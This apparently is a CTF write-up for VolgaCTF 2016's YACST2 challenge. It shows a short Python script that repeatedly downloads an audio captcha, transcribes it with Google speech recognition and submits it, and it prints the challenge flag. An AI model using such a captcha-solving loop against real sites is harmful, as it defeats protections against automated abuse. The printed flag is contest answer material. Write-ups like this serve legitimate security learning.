<-- home

volgactf 2016 / YACST2

March 25, 2016

Description

Captcha is a modern simple Turing test for everyday use, for human it’s simple, but for bot or a simple neural network captcha can become a hard nut to crack.

You can try to solve it with your AI too, but it definitely can be solved with several lines of code, isn’t it?

The Challenge

We are given a website asking us to solve a captcha 3000 times.

The captcha is a wav file of a woman saying a series of numbers.

Enter those numbers and you’ll see the counter go down by 1.

The goal of the challenge is to create a script that will automate the process of :

  • Downloading the captcha
  • Analyzing the content
  • Submitting the captcha

… 3000 times.

I decided to use python’s SpeechRecognizer module, here is the script used for the solution :

#!/usr/bin/env python

import requests
import speech_recognition


recognizer = speech_recognition.Recognizer()

cookies = dict(JSESSIONID='P9vFypsHwI4Tpc0G7vHcdoI6zl0IhDg_SmXiTSRS')
while True:

    audio_file = requests.get("http://yacst2.2016.volgactf.ru:8090/captcha", cookies=cookies).content

    local_file = open('audio.wav', 'w')
    local_file.write(audio_file)
    local_file.close()

    with speech_recognition.WavFile('audio.wav') as wav:
        audio = recognizer.record(wav)
        captcha = recognizer.recognize_google(audio)
        print "Found " + captcha

    data = { "captcha" : captcha }
    content = requests.post("http://yacst2.2016.volgactf.ru:8090/captcha", data=data, cookies=cookies).content
    print content

Submit the last captcha and obtain the flag :

FLAG: VolgaCTF{Sound IS L1ke M@th if A+B=C THEN C-B=A}